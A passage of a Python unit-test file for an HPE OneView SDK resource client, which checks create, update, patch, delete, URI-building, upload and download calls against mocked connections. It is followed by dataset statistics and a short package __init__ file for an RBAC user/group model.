mock_wait4task.return_value = response_body
result = self.resource_client.update_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, response_body)
@mock.patch.object(connection, 'put')
def test_update_with_zero_body_without_task(self, mock_put):
mock_put.return_value = None, self.response_body
result = self.resource_client.update_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, self.response_body)
@mock.patch.object(connection, 'put')
def test_update_with_uri_called_once(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
response = self.resource_client.update(dict_to_update, uri=uri)
self.assertEqual(self.response_body, response)
mock_put.assert_called_once_with(uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_with_custom_headers(self, mock_put):
dict_to_update = {"name": "test"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, uri="/path", custom_headers=self.custom_headers)
mock_put.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'put')
def test_update_with_force(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, uri=uri, force=True)
expected_uri = "/rest/resource/test?force=True"
mock_put.assert_called_once_with(expected_uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_with_api_version_200(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
self.connection._apiVersion = 200
expected_dict = {"name": "test", "type": self.TYPE_V200}
self.resource_client.update(dict_to_update, uri=uri, default_values=self.DEFAULT_VALUES)
mock_put.assert_called_once_with(uri, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_with_default_api_version_300(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
expected_dict = {"name": "test", "type": self.TYPE_V300}
self.resource_client.update(dict_to_update, uri=uri, default_values=self.DEFAULT_VALUES)
mock_put.assert_called_once_with(uri, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_should_not_override_resource_properties(self, mock_put):
dict_to_update = {"name": "test", "type": "anotherType"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, uri=uri, default_values=self.DEFAULT_VALUES)
mock_put.assert_called_once_with(uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_without_default_values(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
resource_client = ResourceClient(self.connection, self.URI)
resource_client.update(dict_to_update, uri=uri)
mock_put.assert_called_once_with(uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_uri(self, mock_wait4task, mock_update):
dict_to_update = {"resource_data": "resource_data",
"uri": "a_uri"}
mock_update.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
update_task = self.resource_client.update(dict_to_update, False)
self.assertEqual(self.task, update_task)
mock_update.assert_called_once_with("a_uri", dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_return_entity(self, mock_wait4task, mock_put):
dict_to_update = {
"resource_name": "a name",
"uri": "a_uri",
}
mock_put.return_value = self.task, {}
mock_wait4task.return_value = dict_to_update
result = self.resource_client.update(dict_to_update, timeout=-1)
self.assertEqual(result, dict_to_update)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_called_once(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body('/rest/enclosures/09USE133E5H4/configuration',
timeout=-1)
mock_post.assert_called_once_with(
"/rest/enclosures/09USE133E5H4/configuration", {}, custom_headers=None)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_called_once_without_uri(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body(timeout=-1)
mock_post.assert_called_once_with(
'/rest/testuri', {}, custom_headers=None)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_and_custom_headers(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body('1', custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_return_entity(self, mock_wait4task, mock_post):
response_body = {"resource_name": "name"}
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = response_body
result = self.resource_client.create_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, response_body)
@mock.patch.object(connection, 'post')
def test_create_with_zero_body_without_task(self, mock_post):
mock_post.return_value = None, self.response_body
result = self.resource_client.create_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, self.response_body)
@mock.patch.object(connection, 'post')
def test_create_uri(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_uri_with_force(self, mock_post):
dict_to_create = {"resource_name": "a name", "force": "yes"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, timeout=-1)
expected_uri = "/rest/testuri"
mock_post.assert_called_once_with(expected_uri, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_with_api_version_200(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.connection._apiVersion = 200
expected_dict = {"resource_name": "a name", "type": self.TYPE_V200}
self.resource_client.create(dict_to_create, timeout=-1, default_values=self.DEFAULT_VALUES)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_with_default_api_version_300(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
expected_dict = {"resource_name": "a name", "type": self.TYPE_V300}
self.resource_client.create(dict_to_create, timeout=-1, default_values=self.DEFAULT_VALUES)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_should_not_override_resource_properties(self, mock_post):
dict_to_create = {"resource_name": "a name", "type": "anotherType"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, default_values=self.DEFAULT_VALUES)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_without_default_values(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_with_custom_headers(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_return_entity(self, mock_wait4task, mock_post):
dict_to_create = {
"resource_name": "a name",
}
created_resource = {
"resource_id": "123",
"resource_name": "a name",
}
mock_post.return_value = self.task, {}
mock_wait4task.return_value = created_resource
result = self.resource_client.create(dict_to_create, -1)
self.assertEqual(result, created_resource)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_wait_for_activity_on_create(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, {}
mock_wait4task.return_value = self.task
self.resource_client.create({"test": "test"}, timeout=60)
mock_wait4task.assert_called_once_with(self.task, 60)
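# A sketch of the header handling these patch tests imply (an assumption
# based on the assertions, not the library source): API versions >= 300 add
# the JSON-Patch content type unless the caller already supplied one.
#
#     headers = dict(custom_headers or {})
#     if api_version >= 300 and "Content-Type" not in headers:
#         headers["Content-Type"] = "application/json-patch+json"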
@mock.patch.object(connection, 'patch')
def test_patch_request_when_id_is_provided_v200(self, mock_patch):
request_body = [{
'op': 'replace',
'path': '/name',
'value': 'new_name',
}]
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', 70)
mock_patch.assert_called_once_with(
'/rest/testuri/123a53cz', request_body, custom_headers={})
@mock.patch.object(connection, 'patch')
def test_patch_request_when_id_is_provided_v300(self, mock_patch):
request_body = [{
'op': 'replace',
'path': '/name',
'value': 'new_name',
}]
mock_patch.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', 70)
mock_patch.assert_called_once_with(
'/rest/testuri/123a53cz', request_body, custom_headers={'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
def test_patch_request_when_uri_is_provided(self, mock_patch):
request_body = [{
'op': 'replace',
'path': '/name',
'value': 'new_name',
}]
mock_patch.return_value = {}, {}
self.resource_client.patch(
'/rest/testuri/123a53cz', 'replace', '/name', 'new_name', 60)
mock_patch.assert_called_once_with(
'/rest/testuri/123a53cz', request_body, custom_headers={'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
def test_patch_with_custom_headers_v200(self, mock_patch):
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch('/rest/testuri/123', 'operation', '/field', 'value',
custom_headers=self.custom_headers)
mock_patch.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'patch')
def test_patch_with_custom_headers_v300(self, mock_patch):
mock_patch.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch('/rest/testuri/123', 'operation', '/field', 'value',
custom_headers=self.custom_headers)
mock_patch.assert_called_once_with(mock.ANY,
mock.ANY,
custom_headers={'Accept-Language': 'en_US',
'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_patch_return_entity(self, mock_wait4task, mock_patch):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
result = self.resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', -1)
self.assertEqual(result, entity)
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_patch_request_custom_headers_with_content_type(self, mock_task, mock_patch):
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {'Content-Type': 'application/json',
'Extra': 'extra'}
self.connection._apiVersion = 300
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch_request('/rest/testuri/id', body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with('/rest/testuri/id', dict_info, custom_headers=headers)
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_patch_request_custom_headers(self, mock_task, mock_patch):
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {'Extra': 'extra'}
self.connection._apiVersion = 300
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch_request('/rest/testuri/id', body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with(
'/rest/testuri/id',
dict_info,
custom_headers={'Extra': 'extra',
'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_wait_for_activity_on_patch(self, mock_wait4task, mock_patch):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
self.resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', -1)
mock_wait4task.assert_called_once_with(self.task, mock.ANY)
def test_delete_with_none(self):
try:
self.resource_client.delete(None)
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'delete')
def test_delete_with_dict_uri(self, mock_delete):
resource = {"uri": "uri"}
mock_delete.return_value = {}, {}
delete_result = self.resource_client.delete(resource)
self.assertTrue(delete_result)
mock_delete.assert_called_once_with("uri", custom_headers=None)
def test_delete_with_empty_dict(self):
try:
self.resource_client.delete({})
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_get_with_none(self):
try:
self.resource_client.get(None)
except ValueError as e:
self.assertTrue("id" in e.args[0])
else:
self.fail()
def test_get_collection_with_none(self):
try:
self.resource_client.get_collection(None)
except ValueError as e:
self.assertTrue("id" in e.args[0])
else:
self.fail()
def test_create_with_none(self):
try:
self.resource_client.create(None)
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_create_with_empty_dict(self):
try:
self.resource_client.create({})
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_update_with_none(self):
try:
self.resource_client.update(None)
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_update_with_empty_dict(self):
try:
self.resource_client.update({})
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_get_by_with_name_none(self):
try:
self.resource_client.get_by(None, None)
except ValueError as e:
self.assertTrue("field" in e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'get')
def test_get_with_uri_should_work(self, mock_get):
mock_get.return_value = {}
uri = self.URI + "/ad28cf21-8b15-4f92-bdcf-51cb2042db32"
self.resource_client.get(uri)
mock_get.assert_called_once_with(uri)
def test_get_with_uri_with_incompatible_url_should_fail(self):
message = "Unrecognized URI for this resource"
uri = "/rest/interconnects/ad28cf21-8b15-4f92-bdcf-51cb2042db32"
try:
self.resource_client.get(uri)
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(message, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_get_with_uri_from_another_resource_with_incompatible_url_should_fail(self):
message = "Unrecognized URI for this resource"
uri = "/rest/interconnects/ad28cf21-8b15-4f92-bdcf-51cb2042db32"
fake_resource = FakeResource(None)
try:
fake_resource.get_fake(uri)
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(message, exception.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, 'get')
def test_get_utilization_with_args(self, mock_get):
self.resource_client.get_utilization('09USE7335NW3', fields='AmbientTemperature,AveragePower,PeakPower',
filter='startDate=2016-05-30T03:29:42.361Z',
refresh=True, view='day')
expected_uri = '/rest/testuri/09USE7335NW3/utilization' \
'?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z' \
'&fields=AmbientTemperature%2CAveragePower%2CPeakPower' \
'&refresh=true' \
'&view=day'
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(connection, 'get')
def test_get_utilization_with_multiple_filters(self, mock_get):
self.resource_client.get_utilization(
'09USE7335NW3',
fields='AmbientTemperature,AveragePower,PeakPower',
filter=['startDate=2016-05-30T03:29:42.361Z',
'endDate=2016-05-31T03:29:42.361Z'],
refresh=True,
view='day')
expected_uri = '/rest/testuri/09USE7335NW3/utilization' \
'?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z' \
'&filter=endDate%3D2016-05-31T03%3A29%3A42.361Z' \
'&fields=AmbientTemperature%2CAveragePower%2CPeakPower' \
'&refresh=true' \
'&view=day'
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(connection, 'get')
def test_get_utilization_by_id_with_defaults(self, mock_get):
self.resource_client.get_utilization('09USE7335NW3')
expected_uri = '/rest/testuri/09USE7335NW3/utilization'
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(connection, 'get')
def test_get_utilization_by_uri_with_defaults(self, mock_get):
self.resource_client.get_utilization('/rest/testuri/09USE7335NW3')
expected_uri = '/rest/testuri/09USE7335NW3/utilization'
mock_get.assert_called_once_with(expected_uri)
def test_get_utilization_with_empty(self):
try:
self.resource_client.get_utilization('')
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_id_should_work(self):
input = '09USE7335NW35'
expected_output = '/rest/testuri/09USE7335NW35'
result = self.resource_client.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_uri_should_work(self):
input = '/rest/testuri/09USE7335NW3'
expected_output = '/rest/testuri/09USE7335NW3'
result = self.resource_client.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_none_should_raise_exception(self):
try:
self.resource_client.build_uri(None)
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_empty_str_should_raise_exception(self):
try:
self.resource_client.build_uri('')
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_different_resource_uri_should_raise_exception(self):
try:
self.resource_client.build_uri(
'/rest/test/another/resource/uri/09USE7335NW3')
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_incomplete_uri_should_raise_exception(self):
try:
self.resource_client.build_uri('/rest/')
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_subresource_uri(self):
options = [
dict(
resource='1',
subresource='2',
path='sub',
uri='/rest/testuri/1/sub/2'),
dict(
resource='/rest/testuri/3',
subresource='4',
path='sub',
uri='/rest/testuri/3/sub/4'),
dict(
resource='5',
subresource='/rest/testuri/5/sub/6',
path='sub',
uri='/rest/testuri/5/sub/6'),
dict(
resource='/rest/testuri/7',
subresource='/rest/testuri/7/sub/8',
path='sub',
uri='/rest/testuri/7/sub/8'),
dict(
resource=None,
subresource='/rest/testuri/9/sub/10',
path='sub',
uri='/rest/testuri/9/sub/10'),
dict(
resource='/rest/testuri/11',
subresource='12',
path='/sub/',
uri='/rest/testuri/11/sub/12'),
dict(
resource='/rest/testuri/13',
subresource=None,
path='/sub/',
uri='/rest/testuri/13/sub'),
]
for option in options:
uri = self.resource_client.build_subresource_uri(option['resource'], option['subresource'], option['path'])
self.assertEqual(uri, option['uri'])
def test_build_subresource_uri_with_subresourceid_and_without_resource_should_fail(self):
try:
self.resource_client.build_subresource_uri(None, "123456", 'sub-path')
except exceptions.HPOneViewValueError as exception:
self.assertEqual(RESOURCE_ID_OR_URI_REQUIRED, exception.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_do_post_request(self, mock_get_completed_task, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
self.resource_client.create_report("/rest/path/create-report")
mock_post.assert_called_once_with("/rest/path/create-report", {})
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_wait_task_completion(self, mock_get_completed_task, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
self.resource_client.create_report("/rest/path/create-report", timeout=60)
mock_get_completed_task.assert_called_once_with(self.task, 60)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_return_output_list_when_results(self, mock_get_completed_task, mock_post):
task_output = [
{"type": "FCIssueResponseV2", "created": "2015-03-24T15:32:50.889Z"},
{"type": "FCIssueResponseV2", "created": "2015-03-13T14:10:50.322Z"}
]
task_with_output = self.task.copy()
task_with_output['taskOutput'] = task_output
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
result = self.resource_client.create_report("/rest/path/create-report")
self.assertEqual(result, task_output)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_return_empty_list_when_output_is_empty(self, mock_get_completed_task, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
result = self.resource_client.create_report("/rest/path/create-report")
self.assertEqual(result, [])
@mock.patch.object(connection, 'post')
def test_create_report_should_raise_exception_when_not_task(self, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = None, {}
try:
self.resource_client.create_report("/rest/path/create-report")
except exceptions.HPOneViewException as exception:
self.assertEqual(RESOURCE_CLIENT_TASK_EXPECTED, exception.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, 'post')
def test_create_when_the_resource_is_a_list(self, mock_post):
dict_to_create = [{"resource_name": "a name"}]
mock_post.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
def test_merge_api_default_values(self):
resource = {'name': 'resource1'}
default_values = {
'200': {"type": "EnclosureGroupV200"},
'300': {"type": "EnclosureGroupV300"}
}
expected = {'name': 'resource1', "type": "EnclosureGroupV300"}
resource_client = ResourceClient(self.connection, self.URI)
result = resource_client.merge_default_values(resource, default_values)
self.assertEqual(result, expected)
def test_should_not_merge_when_default_values_not_defined(self):
resource = {'name': 'resource1'}
default_values = {}
expected = {'name': 'resource1'}
resource_client = ResourceClient(self.connection, self.URI)
result = resource_client.merge_default_values(resource, default_values)
self.assertEqual(result, expected)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
def test_upload_should_call_post_multipart(self, mock_post_multipart):
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_post_multipart.assert_called_once_with(uri, filepath, 'SPPgen9snap6.2015_0405.81.iso')
@mock.patch.object(connection, 'post_multipart_with_response_handling')
def test_upload_should_call_post_multipart_with_resource_uri_when_not_uri_provided(self, mock_post_multipart):
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath)
mock_post_multipart.assert_called_once_with('/rest/testuri', mock.ANY, mock.ANY)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
@mock.patch.object(connection, 'get')
def test_upload_should_wait_for_task_when_response_is_task(self, mock_get, mock_wait4task, mock_post_multipart):
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.assert_called_once_with(self.task, -1)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_upload_should_not_wait_for_task_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.assert_not_called()
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
@mock.patch.object(connection, 'get')
def test_upload_should_return_associated_resource_when_response_is_task(self, mock_get, mock_wait4task,
mock_post_multipart):
fake_associated_resource = mock.Mock()
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
mock_wait4task.return_value = fake_associated_resource
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_associated_resource)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_upload_should_return_resource_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
fake_response_body = mock.Mock()
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, fake_response_body
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_response_body)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_call_download_to_stream_with_given_uri(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
mock_open.return_value = io.StringIO()
self.resource_client.download(uri, file_path)
mock_download_to_stream.assert_called_once_with(mock.ANY, uri, custom_headers=mock.ANY)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_call_download_to_stream_with_open_file(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
fake_file = io.StringIO()
mock_open.return_value = fake_file
self.resource_client.download(uri, file_path)
mock_open.assert_called_once_with(file_path, 'wb')
mock_download_to_stream.assert_called_once_with(fake_file, uri, custom_headers=mock.ANY)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_return_true_when_success(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
mock_download_to_stream.return_value = True
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertTrue(result)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_return_false_when_error(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
mock_download_to_stream.return_value = False
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertFalse(result)
def test_transform_list_to_dict(self):
items = ['one', 'two', {'tree': 3}, 'four', 5]
dict_transformed = transform_list_to_dict(list=items)
self.assertEqual(dict_transformed,
{'5': True,
'four': True,
'one': True,
'tree': 3,
'two': True})
def test_extract_id_from_uri(self):
uri = '/rest/plan-scripts/3518be0e-17c1-4189-8f81-83f3724f6155'
expected_id = '3518be0e-17c1-4189-8f81-83f3724f6155'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(expected_id, extracted_id)
def test_extract_id_from_uri_with_extra_slash(self):
uri = '/rest/plan-scripts/3518be0e-17c1-4189-8f81-83f3724f6155/'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(extracted_id, '')
def test_extract_id_from_uri_passing_id(self):
uri = '3518be0e-17c1-4189-8f81-83f3724f6155'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(extracted_id, '3518be0e-17c1-4189-8f81-83f3724f6155')
def test_extract_id_from_uri_unsupported(self):
# This example is not supported yet
uri = '/rest/plan-scripts/3518be0e-17c1-4189-8f81-83f3724f6155/otherthing'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(extracted_id, 'otherthing')
| 42.21117 | 127 | 0.665727 | 12,650 | 103,544 | 5.131146 | 0.037866 | 0.042845 | 0.058004 | 0.061625 | 0.921829 | 0.904235 | 0.885286 | 0.867969 | 0.849158 | 0.832812 | 0 | 0.026513 | 0.211002 | 103,544 | 2,452 | 128 | 42.228385 | 0.768006 | 0.011512 | 0 | 0.695062 | 0 | 0.011394 | 0.155244 | 0.065934 | 0 | 0 | 0 | 0 | 0.124254 | 1 | 0.119913 | false | 0.000543 | 0.004341 | 0.000543 | 0.137819 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
538700fd5d58b1e117fad14517de686aecad4c56
| 171 |
py
|
Python
|
leaf/rbac/model/__init__.py
|
guiqiqi/leaf
|
79e34f4b8fba8c6fd208b5a3049103dca2064ab5
|
[
"Apache-2.0"
] | 119 |
2020-01-30T04:25:03.000Z
|
2022-03-27T07:15:45.000Z
|
leaf/rbac/model/__init__.py
|
guiqiqi/leaf
|
79e34f4b8fba8c6fd208b5a3049103dca2064ab5
|
[
"Apache-2.0"
] | 8 |
2020-02-02T05:49:47.000Z
|
2021-01-25T03:31:09.000Z
|
leaf/rbac/model/__init__.py
|
guiqiqi/leaf
|
79e34f4b8fba8c6fd208b5a3049103dca2064ab5
|
[
"Apache-2.0"
] | 11 |
2020-01-31T15:07:11.000Z
|
2021-03-24T03:47:48.000Z
|
"""用户, 组, 及相关认证数据库模型"""
from .group import Group
from .user import User
from .user import UserIndex
from .auth import Authentication
from .accesspoint import AccessPoint
